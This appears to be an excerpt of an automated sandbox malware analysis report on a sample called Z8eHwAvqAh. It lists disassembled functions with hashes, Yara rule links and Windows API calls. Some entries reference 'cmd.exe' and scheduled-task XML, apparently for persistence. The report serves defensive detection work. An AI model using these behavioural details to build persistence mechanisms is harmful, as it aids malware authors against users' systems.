                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                              • Instruction ID: 5041421aec073d2b688b2073802020d7c79b1bca3df2cb6ef25812ac66b41e1f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA02D430A017459FEB24CF18C590AAFB7F1FF91310F14855AE8A65B3A1D738AD82C7A5
                                                                                                                                                                                                              Function 00408FA0 Relevance: .5, Instructions: 466COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                              • Instruction ID: a657eec15ca3c5bb160301247c07cdb44cfdd935969e5cbf472f05e5335aa939
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6F19E71A00619ABDB20CF98C980BAFB7A5EF89314F10417EED05A7382D779DD41CBA5
                                                                                                                                                                                                              Function 0043AC30 Relevance: .5, Instructions: 457COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                              • Instruction ID: 1bcbb60a4870fb6f7824f06d04ae27aaebc780d04162e94b05afeb65d1883275
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94124A71E002198FCF18CF99C9906AEFBF2FF88314F18916AD859AB754D738A941CB54
                                                                                                                                                                                                              Function 00440880 Relevance: .4, Instructions: 410COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                              • Instruction ID: f2c5ae519af86c61090003759672b7809cd436e53f2fd5b45b2c1165b140046f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAE12A309417859FFB25CF28C4906AEBBF1EF52310F1882AFD5E55B392C238A956C758
                                                                                                                                                                                                              Function 0044A8A0 Relevance: .4, Instructions: 390COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                              • Instruction ID: 3d5b5479c895319a2c4470d34a8ff6393b73061c9a225c3785347aa2e70d1fa5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DE10330E045458FDB08CF68C9806ADBBF3EF89310B28C1AED495DB346D639EA46CB55
                                                                                                                                                                                                              Function 0043C0D0 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                              • Instruction ID: 8b1a689c82d0fe3ee89c344c2f7eab184c0c6edd59e3ba46ea3345da4373e9f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1ED13576E0021A8FCB18CF99C9815AEFBB2FF98310F25956AD815BB704D734A911CF94
                                                                                                                                                                                                              Function 00406B60 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction ID: 661d4224e0226a62dc5565bcde94e6aa946e1ef99945e038f73d7b47cfba27f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7917371D01215AFDB50EFA5C840B9EB7B5AF88304F26847EE805B7381D738AD11CBA8
                                                                                                                                                                                                              Function 0044E613 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                              • Instruction ID: e1d19a3f0243f14b79b01c451a6d6cb00abb7833888d4a0596576d76429fa551
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E81C5319893918BC795DF38C8D65D6BBB1EE4322432E85DDC8940EA03E22F651BDF51
                                                                                                                                                                                                              Function 0043CC10 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                              • Instruction ID: 91c87d25872e839baae7933b1d26ceab25bf760725ff438016367df0c9695c0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E51B333F215214BE348EA7ACC8415A73D3EBCA31075AC63AD901DB395E974E96396C4
                                                                                                                                                                                                              Function 0040ED30 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                              • Instruction ID: f12356c3dda02b0944d66f82227427b0d7e0263a6395cb29892584ed5db79ad8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19517C7190D3918BD311CF2AC48066BBBE1AFD9314F044E6EF8C4A7352D7798A458B96
                                                                                                                                                                                                              Function 0043CA30 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                              • Instruction ID: 448e8c8128ee218613f355b6a59d53b40018dab5e4ac80cca173ede8df55363b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4141C277E51A3947F3188949CD81744AA52ABCC324F2B83B5CD2C6B356D8B9ED039AD0
                                                                                                                                                                                                              Function 0040EF50 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                              • Instruction ID: 081832729734f64ca8943200ec232ae7a260b1d72c680c68a8391be1ada1e6fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9751D07150D3918BD321CF29C48066BBBE1ABD9314F084A7EF8D497352D778CA49CB92
                                                                                                                                                                                                              Function 0042EB80 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                              • Instruction ID: b4677f41d66d6811b44967b30f698def2232b76b1c2307f426304baac9f77722
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 472150339744B701E7908B768C8863277E3EFCB245FAF85B5D649C7652E23DE4029124
                                                                                                                                                                                                              Function 004147E0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                              • Instruction ID: f17dcb8967b96d5ed4dd8b06982efda1dc527591578653ebadaafebabbad66e2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5201C43F174E8D42852D642C1024AFA12405B9275A7D4062BEAD7D83E2EFCED8E7D08F
                                                                                                                                                                                                              Function 00414050 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                              • Instruction ID: b1f166e1dc89a3f01e43aa2e4643af66497838ab6b388673c2e8518e001627dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A301A2B59057189FEB20DF54DD857ABBBB4FB06304F40819DE98D97280C3B51A84CB96
                                                                                                                                                                                                              Function 00406800 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                              • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                              Function 00403699 Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 292memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                              • String ID: 00-->$<Actions
                                                                                                                                                                                                              • API String ID: 3028510665-1934172683
                                                                                                                                                                                                              • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                              Function 00403050 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 436commemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,?,75C8DB30), ref: 00403060
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                              • String ID: cmd.exe
                                                                                                                                                                                                              • API String ID: 2839743307-723907552
                                                                                                                                                                                                              • Opcode ID: c83219c8b1fcc2364968f814fc3d8ceb50f78c4147f13553458a25b82dac8a32
                                                                                                                                                                                                              • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c83219c8b1fcc2364968f814fc3d8ceb50f78c4147f13553458a25b82dac8a32
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                              Function 00401EA0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,75C8DB30), ref: 00401EC6
